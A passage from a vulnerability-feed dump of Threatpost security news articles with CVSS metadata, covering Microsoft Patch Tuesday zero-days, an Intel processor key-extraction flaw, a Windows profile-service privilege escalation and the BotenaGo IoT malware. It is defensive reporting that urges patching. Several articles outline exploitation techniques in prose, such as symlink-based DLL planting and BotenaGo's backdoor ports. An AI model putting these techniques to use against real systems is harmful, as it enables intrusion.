Initiative, said in [a blog](<https://www.zerodayinitiative.com/blog/2022/4/11/the-april-2022-security-update-review>) breaking down the fixes.\n\n## **Zero-Day Patches**\n\nThe vulnerability that\u2019s been exploited in the wild ahead of patching allows privilege escalation, and is tracked as [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>). It rates 7.8 out of 10 on the CVSS vulnerability-severity scale. It\u2019s listed as a \u201cWindows Common Log File System Driver Execution Vulnerability,\u201d and was reported to Microsoft by the National Security Agency.\n\n\u201cIt\u2019s not stated how widely the exploit is being used in the wild, but it\u2019s likely still targeted at this point and not broadly available,\u201d Childs noted. \u201cGo patch your systems before that situation changes.\u201d\n\nResearchers noted that attackers are likely pairing it with a separate code-execution bug in their campaigns. For that reason, Immersive Labs\u2019 Kevin Breen, director of cyber-threat research, places the actively exploited bug at the top of the priority list for patching.\n\n\u201cBeing the type of vulnerability for escalating privileges, this would indicate a threat actor is currently using it to aid lateral movement to capitalize on a pre-existing foothold,\u201d he explained.\n\nThe second zero-day is found in the Windows User Profile Service, and is tracked as [CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>).\n\nIt also allows privilege escalation, and rates a CVSS score of 7. Even though it\u2019s listed as exploitation more likely, it has a high attack complexity, Microsoft noted in its advisory, because \u201csuccessful exploitation of this vulnerability requires an attacker to win a race condition.\u201d\n\nEven so, researchers at Tripwire noted that exploit code is available for the bug, including in the [Metasploit framework](<https://threatpost.com/metasploit-still-a-menace/149448/>).\n\n## **Critical Concerns for April**\n\nOut of the critical flaws, all of which allow remote code-execution (RCE), researchers flagged a bug that could allow for self-propagating exploits ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>)) as being of the most concern.\n\nIt exists in the Remote Procedure Call (RPC) Runtime Library, and rates 9.8 out of 10 on the CVSS scale, with exploitation noted as more likely. If exploited, a remote attacker could execute code with high privileges.\n\nDanny Kim, principal architect at Virsec, noted that the vulnerability is specifically found in Microsoft\u2019s Server Message Block (SMB) functionality, which is used primarily for file-sharing and inter-process communication, including Remote Procedure Calls. RPC is a communication mechanism that allows for one program to request a service or functionality from another program located on the network (internet and/or intranet). RPCs can be used in technologies like storage replica or managing shared volumes.\n\n\u201cThis vulnerability is another example of an attacker taking advantage of legitimate functionality for malicious gain,\u201d he said via email. \u201cUsing the vulnerability, an attacker can create a specially crafted RPC to execute code on the remote server with the same permissions as the RPC service.\u201d\n\nThe bug could be used to create especially virulent threats, according to Childs.\n\n\u201cSince no user interaction is required, these factors combine to make this wormable, at least between machines where RPC can be reached,\u201d Childs noted.\n\nMicrosoft recommends configuring firewall rules to help prevent this vulnerability from being exploited; the static port used (TCP port 135) can be blocked at the network perimeter.\n\n\u201cStill, this bug could be used for lateral movement by an attacker,\u201d Childs warned. \u201cDefinitely test and deploy this one quickly.\u201d\n\nNext up are [CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>)/[24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>), two RCE bugs that affect the Windows Network File System (NFS). Both also have CVSS scores of 9.8, and both are listed as exploitation more likely. They also allow the potential for worming exploits, Childs warned.\n\n\u201cOn systems where the NFS role is enabled, a remote attacker could execute their code on an affected system with high privileges and without user interaction,\u201d Childs explained. \u201cAgain, that adds up to a wormable bug \u2013 at least between NFS servers. Similar to RPC, this is often blocked at the network perimeter.\u201d\n\nImmersive\u2019s Breen added, \u201cThese could be the kind of vulnerabilities which appeal to ransomware operators as they provide the potential to expose critical data. It is also important for security teams to note that NFS Role is not a default configuration for Windows devices.\u201d\n\nThe remaining critical vulnerabilities are as follows:\n\n * [CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>): Microsoft Dynamics 365 (on-premises) (CVSS 8.8)\n * [CVE-2022-22008](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22008>): Windows Hyper-V (CVSS 7.7)\n * [CVE-2022-23257](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23257>): Windows Hyper-V (CVSS 8.6)\n * [CVE-2022-24537](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24537>): Windows Hyper-V (CVSS 7.7)\n * [CVE-2022-26919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26919>): Windows LDAP (CVSS 8.1)\n * [CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>): Windows Server (CVSS 8.8)\n * [CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>): Windows SMB (CVSS 8.8)\n\n## **Other Bugs of Note**\n\nAlso worth mentioning: Out of a whopping 18 bugs found in the Windows Domain Name Server (DNS), one ([CVE-2022-26815](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26815>)) allows RCE and is listed as important, with a CVSS score of 7.2.\n\nMicrosoft noted that while attack complexity is low, \u201cthe attacker or targeted user would need specific elevated privileges [for successful exploitation]. As is best practice, regular validation and audits of administrative groups should be conducted.\u201d\n\nMeanwhile, \u201cthere are a couple of important mitigations to point out here,\u201d Childs noted. \u201cThe first is that dynamic updates must be enabled for a server to be affected by this bug. The CVSS also lists some level of privileges to exploit. Still, any chance of an attacker getting RCE on a DNS server is one too many, so get your DNS servers patched.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-12T20:00:54", "type": "threatpost", "title": "Microsoft Zero-Days, Wormable Bugs Spark Concern", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22008", "CVE-2022-23257", "CVE-2022-23259", "CVE-2022-24491", "CVE-2022-24497", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24537", "CVE-2022-24541", "CVE-2022-26809", "CVE-2022-26815", "CVE-2022-26904", "CVE-2022-26919"], "modified": "2022-04-12T20:00:54", "id": "THREATPOST:C4B358E42FF02B710BE90F363212C84F", "href": "https://threatpost.com/microsoft-zero-days-wormable-bugs/179273/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T11:15:19", "description": "Microsoft has revealed 73 new patches for [May\u2019s monthly update of security fixes](<https://msrc.microsoft.com/update-guide/releaseNote/2022-May>), including a patch for one flaw\u2013a zero-day Windows LSA Spoofing Vulnerability rated as \u201cimportant\u201d\u2014that is currently being exploited with man-in-the-middle attacks.\n\nThe software giant\u2019s monthly update of patches that comes out every second Tuesday of the month\u2013known as Patch Tuesday\u2014also included fixes for seven \u201ccritical\u201d flaws, 65 others rated as \u201cimportant,\u201d and one rated as \u201clow.\u201d\n\n\u201cAlthough this isn\u2019t a large number, this month makes up for it in severity and infrastructure headaches,\u201d observed Chris Hass, director of security at security firm [Automox](<https://www.automox.com/>)_, _in an email to Threatpost. \u201cThe big news is the critical vulnerabilities that need to be highlighted for immediate action.\u201d\n\nOf the seven critical flaws, five allow for remote code execution (RCE) and two give attackers elevation of privilege (EoP). The remainder of the flaws also include a high percentage of RCE and EoP bugs, with the former accounting for 32.9 percent of the flaws patched this month, while the latter accounted for 28.8 percent of fixes, according to [a blog post](<https://www.tenable.com/blog/microsofts-may-2022-patch-tuesday-addresses-73-cves-cve-2022-26925>) by researchers at Tenable.\n\nThe Windows LSA Spoofing Vulnerability, tracked as [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26925>), in and of itself was not rated as critical. However, when chained with a new technology LAN manager (NTLM) relay attack, the combined CVSSv3 score for the attack chain is 9.8, noted Allan Liska, a senior security architect at Recorded Future, in an e-mail to Threatpost.\n\nMoreover, the flaw\u2014which allows an unauthenticated attacker to coerce domain controllers to authenticate to an attacker-controller server using NTLM\u2013is being exploited in the wild as a zero-day, he said. This makes it a priority to patch, Liska added, echoing guidance from Microsoft.\n\n## **Critical Infrastructure Vulnerabilities **\n\nOf the other critical RCE flaws patched by Microsoft, four are worth noting because of their presence in infrastructure that\u2019s fairly ubiquitous in many enterprise and/or cloud environments.\n\nOne is tracked as [CVE-2022-29972](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29972>) and is found in Insight Software\u2019s Magnitude Simba Amazon Redshift ODBC Driver, and would need to be patched by a cloud provider\u2014something organizations should follow up on, Liska said.\n\n[CVE-2022-22012](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22012>) and [CVE-2022-29130](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29130>) are RCE vulnerabilities found in Microsoft\u2019s LDAP service that are rated as critical. However, a caveat by Microsoft in its security bulletin noted that they are only exploitable \u201cif the MaxReceiveBuffer LDAP policy is set to a value higher than the default value.\u201d That means that systems with the default value of this policy would not be vulnerable, the company said.\n\nWhile \u201chaving the MaxReceiveBuffer set to a higher value than the default\u201d seems an \u201cuncommon configuration,\u201d if an organization has this setting, it should prioritize patching these vulnerabilities, Liska observed.\n\nAnother critical RCE, [CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>), is found in the Network File System (NFS) and has broad impact for Windows Server versions 2008 through 2022. However, this vulnerability only affects NFSV2 and NFSV3, and Microsoft has included instructions for disabling these [versions of the NFS in the bulletin](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>).\n\nAt the same time, Microsoft characterized the ease of exploitation of these vulnerabilities as \u201cExploitation More Likely,\u201d as was the case with a similar vulnerability, [CVE-2021-26432](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26432>), an actively exploited zero day in the TCP/IP protocol stack in Windows server that [was patched](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>) in August 2021.\n\n\u201cGiven the similarities between these vulnerabilities and those of August of 2021, we could all be in store for a rough May,\u201d Liska noted.\n\n## **Another Important Flaw Fixed**\n\nOf the other flaws, another \u201cimportant\u201d one to note is [CVE-2022-22019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22019>), a companion vulnerability to three previously disclosed and patched flaws found in Microsoft\u2019s Remote Procedure Call (RPC) runtime library.\n\nThe vulnerability, discovered by Akamai researcher Ben Barnea, takes advantage of three RPC runtime library flaws that Microsoft had patched in April\u2013[CVE-2022-26809](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809>), [CVE-2022-24492](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24492>) and [CVE-2022-24528](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24528>), he revealed in [a blog post Tuesday](<https://www.akamai.com/blog/security/rpc-runtime-patch-tuesday-take-two>). The flaws affected Windows 7, 8, 10 and 11, and Windows Servers 2008, 2012, 2019 and 2022, and could allow a remote, unauthenticated attacker to execute code on the vulnerable machine with the privileges of the RPC service.\n\nAkamai researchers discovered that the previous patch only partially addressed the problem, allowing the new vulnerability to create the same integer overflow that was supposed to be fixed, he explained.\n\n\u201cDuring our research, we found that right before allocating memory for the new coalesced buffer, the code adds another 24 bytes to the allocation size,\u201d Barnea wrote in the post. \u201cThese 24 bytes are the size of a struct called \u2018rpcconn_request_hdr_t,\u2019 which serves as the buffer header.\u201d\n\nThe previous patch performs the check for integer overflow before adding the header size, so it does not take into account this header\u2013which can lead to the same integer overflow that the patch was attempting to mitigate, he explained.\n\n\u201cThe new patch adds another call to validate that the addition of 24 bytes does not overflow,\u201d mitigating the problem, Barnea wrote.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T11:12:11", "type": "threatpost", "title": "Actively Exploited Zero-Day Bug Patched by Microsoft", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26432", "CVE-2022-22012", "CVE-2022-22019", "CVE-2022-24492", "CVE-2022-24528", "CVE-2022-26809", "CVE-2022-26925", "CVE-2022-26937", "CVE-2022-29130", "CVE-2022-29972"], "modified": "2022-05-11T11:12:11", "id": "THREATPOST:B7A9B20B1E9413BB675D8C2810F1365F", "href": "https://threatpost.com/microsoft-zero-day-mays-patch-tuesday/179579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-15T21:22:00", "description": "A security vulnerability in Intel chips opens the door for encrypted file access and espionage, plus the ability to bypass copyright protection for digital content.\n\nThat\u2019s according to Positive Technologies (PT), which found that the vulnerability (CVE-2021-0146) is a debugging functionality with excessive privileges, which is not protected as it should be.\n\nThe high-severity privilege-escalation issue is rated 7.1 out of 10 on the CVSS vulnerability-severity scale.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/10110941/Uptycs-November-Article-Promo-300x300.jpg)](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\n\u201c[The] hardware allows activation of test or debug logic at runtime for some Intel processors which may allow an unauthenticated user to potentially enable escalation of privilege via physical access,\u201d according to Intel\u2019s advisory, [issued last week](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00528.html>).\n\nIn terms of scope, the vulnerability affects the Pentium, Celeron and Atom processors of the Apollo Lake, Gemini Lake and Gemini Lake Refresh platforms. These chips power laptops, mobile devices, embedded systems, medical devices and a variety of internet of things (IoT) offerings.\n\n\u201cAccording to a study by Mordor Intelligence, Intel ranks fourth in the IoT chip market, while its Intel Atom E3900 series IoT processors, which also contain the CVE-2021-0146 vulnerability, are used by car manufacturers in more than 30 models, including, according to unofficial sources, in Tesla\u2019s Model 3,\u201d PT noted in a writeup shared with Threatpost.\n\nTo address the issue, users should install the [UEFI BIOS](<https://threatpost.com/intel-security-holes-cpus-bluetooth-security/166747/>) updates published by manufacturers of each piece of electronic equipment. The following processor models are affected:\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/15150632/Intel-chip-bug.png)\n\nSource: Intel.\n\n## **CVE-2021-0146 Impact for End Users**\n\nWhen it comes to impact, an exploit would allow cybercriminals to extract a device\u2019s encryption key and gain access to information.\n\n\u201cOne example of a real threat is lost or stolen laptops that contain confidential information in encrypted form,\u201d said Mark Ermolov, a PT researcher who was credited with discovering the bug (along with PT\u2019s Dmitry Sklyarov and independent researcher Maxim Goryachy).\n\nThe vulnerability is also dangerous because it facilitates the extraction of the root encryption key used in Intel\u2019s Platform Trust Technology and Enhanced Privacy ID technologies, which are used to protect digital content from illegal copying, Ermolov added\n\n\u201cFor example, a number of Amazon e-book models use Intel EPID-based protection for digital rights management,\u201d he explained. \u201cUsing this vulnerability, an intruder might extract the root EPID key from a device (e-book), and then, having compromised Intel EPID technology, download electronic materials from providers in file form, copy and distribute them.\u201d\n\nAdditionally, an exploit could allow cyberattackers to conduct targeted attacks across the supply chain, Ermolov noted.\n\n\u201cFor example, an employee of an Intel processor-based device supplier could extract the Intel CSME firmware key and deploy spyware that security software would not detect,\u201d he said.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-15T20:52:27", "type": "threatpost", "title": "High-Severity Intel Processor Bug Exposes Encryption Keys", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-15T20:52:27", "id": "THREATPOST:53A062956C31459E2846CD4C959DFD49", "href": "https://threatpost.com/intel-processor-bug-encryption-keys/176355/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:03", "description": "A partially unpatched security bug in Windows that could allow local privilege escalation from a regular user to System remains unaddressed fully by Microsoft \u2013 but an unofficial micropatch from oPatch has hit the scene.\n\nThe bug ([CVE-2021-34484](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34484>)) was originally disclosed and patched as part of Microsoft\u2019s [August Patch Tuesday updates](<https://threatpost.com/exploited-windows-zero-day-patch/168539/>). At the time, it was categorized as an arbitrary directory-deletion issue that was considered low-priority because an attacker would need to locally log into the targeted computer to exploit it, which, in theory, would allow the adversary to delete file folders anyway.\n\nHowever, the security researcher who discovered it, Abdelhamid Naceri, [soon uncovered](<https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>) that it could also be used for privilege escalation, which is a whole other ball of wax. System-level users have access to resources, databases and servers on other parts of the network.\n\nAbdelhamid also took a look at Microsoft\u2019s original patch, subsequently finding a bypass for it via a simple tweak to the exploit code he had developed, essentially reverting it to zero-day status.\n\n> CVE-2021-34484 bypass as 0day<https://t.co/W0gnYHxJ6B>\n> \n> \u2014 Abdelhamid Naceri (@KLINIX5) [October 22, 2021](<https://twitter.com/KLINIX5/status/1451558296872173577?ref_src=twsrc%5Etfw>)\n\n\u201cThe vulnerability lies in the User Profile Service, specifically in the code responsible for creating a temporary user profile folder in case the user\u2019s original profile folder is damaged or locked for some reason,\u201d explained 0Patch\u2019s Mitja Kolsek in a [Thursday writeup](<https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html>) . \u201cAbdelhamid found that the process (executed as Local System) of copying folders and files from user\u2019s original profile folder to the temporary one can be attacked with symbolic links to create attacker-writable folders in a system location from which a subsequently launched system process would load and execute attacker\u2019s DLL.\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/10110941/Uptycs-November-Article-Promo-300x300.jpg)](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nThe exploit is straightforward: An attacker would create a specially crafted symbolic link (essentially, a shortcut link that points to a specific file or folder), then would need to save it in the temporary user profile folder (C:\\Users\\TEMP).\n\nThen, when the User Profile Service copies a folder from user\u2019s original profile folder as described by Kolsek, the symbolic link will force it to create a folder containing a malicious library (DLL) payload somewhere else where the attacker would normally not have permissions to create one.\n\n\u201cMicrosoft, even though believing the vulnerability only allowed for deletion of an arbitrarily \u2018symlinked\u2019 folder, made a conceptually correct fix: it checked whether the destination folder under C:\\Users\\TEMP was a symbolic link, and aborted the operation if so,\u201d explained Kolsek. \u201cThe incompleteness of this fix, as noticed by Abdelhamid, was in the fact that the symbolic link need not be in the upper-most folder (which Microsoft\u2019s fix checked), but in any folder along the destination path.\u201d\n\nThe micropatch fixes this by extending the security check for symbolic links to the entire destination path by calling the \u201cGetFinalPathNameByHandle\u201d function.\n\nIt should be noted that a workable exploit also requires attackers to be able to win a race condition (with unlimited attempts) since the system will be attempting to perform two operations (one malicious, one legitimate) at the same time. Also, even though Abdelhamid said that \u201cit might be possible to [exploit] without knowing someone [else\u2019s] password,\u201d so far, having user credentials for the targeted computer remains an obstacle, Kolsek noted.\n\nThe bug affects Windows 10 (both 32 and 64 bit), versions v21H1, v20H2, v2004 and v1909; and Windows Server 2019 64 bit.\n\nMicrosoft hasn\u2019t released a timeline for updating its official patch and didn\u2019t immediately respond to a request for comment.\n\n**_Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, _**[**_\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d_**](<https://bit.ly/3bBMX30>) **_on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops._**\n\n[**_Register NOW_**](<https://bit.ly/3bBMX30>)_** for the LIVE event!**_\n", "cvss3": {}, "published": "2021-11-12T19:49:05", "type": "threatpost", "title": "Windows 10 Privilege-Escalation Zero-Day Gets Unofficial Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T19:49:05", "id": "THREATPOST:84909E392F4171398A52202CCC4E215A", "href": "https://threatpost.com/windows-10-privilege-escalation-zero-day-unofficial-fix/176313/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-15T21:22:33", "description": "Newly surfaced malware that is difficult to detect and written in Google\u2019s open-source programming language has the potential to [exploit millions](<https://threatpost.com/bug-iot-millions-devices-attackers-eavesdrop/168729/>) of routers and [IoT devices](<https://threatpost.com/iot-attacks-doubling/169224/>), researchers have found.\n\nDiscovered by researchers at AT&T AlienLabs, BotenaGo can exploit more than 30 different vulnerabilities to attack a target, Ofer Caspi, a security researcher at Alien Labs, wrote in a [blog post](<https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits>) published Thursday.\n\nThe malware, which is written in [Golang](<https://golang.org/>)\u2014a language Google first published in 2007\u2013works by creating a backdoor to the device. It then waits to either receive a target to attack from a remote operator through port 19412 or from another related module running on the same machine, he wrote.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/10110941/Uptycs-November-Article-Promo-300x300.jpg)](<https://threatpost.com/webinars/multi-cloud-security-and-visibility-an-intro-to-osquery-and-cloudquery/?utm_source=uptycs&utm_medium=email&utm_campaign=event&utm_id=uptycs&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nGolang, also known as Go, is aimed at simplifying how software is built by making it easy for developers to compile the same code for different systems. This feature may be the reason why it\u2019s caught on with malware developers in the last few years, since it also makes it easier for attackers to spread malware on multiple operating systems, Caspi wrote.\n\nIndeed, [research from Intezer](<https://www.intezer.com/blog/malware-analysis/year-of-the-gopher-2020-go-malware-round-up/>), which offers a platform for analyzing malware, suggests that there has been a 2,000 percent increase in malware code written in Go being found in the wild, he wrote.\n\nResearchers said at this time they don\u2019t know which threat actor or actors developed BotenaGo, nor the full scale of devices that are vulnerable to the malware. So far, antivirus protections also don\u2019t seem to recognize the malware, sometimes misidentifying it as a [variant of Mirai malware](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), Caspi wrote.\n\n## **Setting Up the Attack**\n\nBotenaGo commences its work with some exploratory moves to see if a device is vulnerable to attack, Caspi wrote. It starts by initializing global infection counters that will be printed to the screen, informing the attacker about total successful infections. The malware then looks for the \u2018dlrs\u2019 folder in which to load shell scripts files. If this folder is missing, BotenaGo stops the infection process.\n\nIn its last step before fully engaging, BotenaGo calls the function \u2018scannerInitExploits\u2019, \u201cwhich initiates the malware attack surface by mapping all offensive functions with its relevant string that represent the targeted system,\u201d Caspi wrote.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/12123900/specops_midroll-promo.jpg)](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/?utm_source=Specops+&utm_medium=web&utm_campaign=event&utm_id=Specops+&utm_term=nov_event&utm_content=IA>)\n\nRegister now for our LIVE event!\n\nOnce it establishes that a device is vulnerable to attack, BotenaGo proceeds with exploit delivery by first querying the target with a simple \u201cGET\u201d request. It then searches the returned data from the \u201cGET\u201d request with each system signature that was mapped to attack functions.\n\nResearchers detail several possible attacks that can be carried out using this query. In one, the malware maps the string \u201cServer: Boa/0.93.15\u201d to the function \u201cmain_infectFunctionGponFiber,\u201d which attempts to exploit a vulnerable target, Caspi wrote.\n\nThis allows the attacker to execute an OS command via a specific web request using a vulnerability tracked as [CVE-2020-8958](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8958>). A [SHODAN search](<https://www.shodan.io/>) turned up nearly 2 million devices that are vulnerable to this type of attack alone, he wrote.\n\n\u201cIn total, the malware initiates 33 exploit functions that are ready to infect potential victims,\u201d Caspi wrote. A full list of the vulnerabilities that BotenaGo can exploit is included in the post.\n\n## **Backdooring Devices to Execute Commands**\n\nThere are two different ways that the malware can receive commands to target victims, researchers found. One is the create backdoor ports\u201331421 and 19412\u2014that are used in an attack scenario, Caspi wrote.\n\n\u201cOn port 19412 it will listen to receive the victim IP,\u201d he wrote. \u201cOnce a connection with information to that port is received, it will loop through mapped exploit functions and execute them with the given IP.\u201d\n\nThe second way BotenaGo can receive a target command is by setting a listener to system IO (terminal) user input, getting the command to the device that way, Caspi explained.\n\n\u201cFor example, if the malware is running locally on a virtual machine, a command can be sent through telnet,\u201d he wrote.\n\n## **Dangers to Corporate Network**\n\nGiven its ability to exploit devices connected over internet ports, BotenaGo can be potentially dangerous to corporate networks by gaining access through vulnerable devices, said one security professional.\n\n\u201cBad actors, such as those at work here, love to exploit these devices to gain access to the internal networks behind them, or just to use it as a platform from which to launch other attacks,\u201d observed Erich Kron, security awareness advocate at security firm [KnowBe4](<http://www.knowbe4.com/>), in an email to Threatpost.\n\nAttackers that can be launched once a hacker takes over a device and piggybacks on the network it\u2019s using include [DDoS attacks](<https://threatpost.com/ddos-attacks-records-q3/176082/>), which that can lead to extortion of money from victims, he said. Attackers also can host and spread malware using a victim\u2019s internet connection, Kron observed.\n\nGiven the number of vulnerabilities of which it can take advantage, BotenaGo also shows the importance of keeping IoT and routers updated with the latest firmware and patches to avoid leaving them available to exploit, he added.\n\n_**Want to win back control of the flimsy passwords standing between your network and the next cyberattack? Join Darren James, head of internal IT at Specops, and Roger Grimes, data-driven defense evangelist at KnowBe4, to find out how during a free, LIVE Threatpost event, **_[**\u201cPassword Reset: Claiming Control of Credentials to Stop Attacks,\u201d**](<https://bit.ly/3bBMX30>)_** on Wed., Nov. 17 at 2 p.m. ET. Sponsored by Specops.**_\n\n[**Register NOW**](<https://bit.ly/3bBMX30>)_** for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at **_[**becky.bracken@threatpost.com**](<mailto:becky.bracken@threatpost.com>)_**.**_\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-12T13:14:44", "type": "threatpost", "title": "Millions of Routers, IoT Devices at Risk from BotenaGo Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8958", "CVE-2021-0146", "CVE-2021-34484"], "modified": "2021-11-12T13:14:44", "id": "THREATPOST:95B32358658F5FEFA1715F69C5D6051D", "href": "https://threatpost.com/routers-iot-open-source-malware/176270/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, 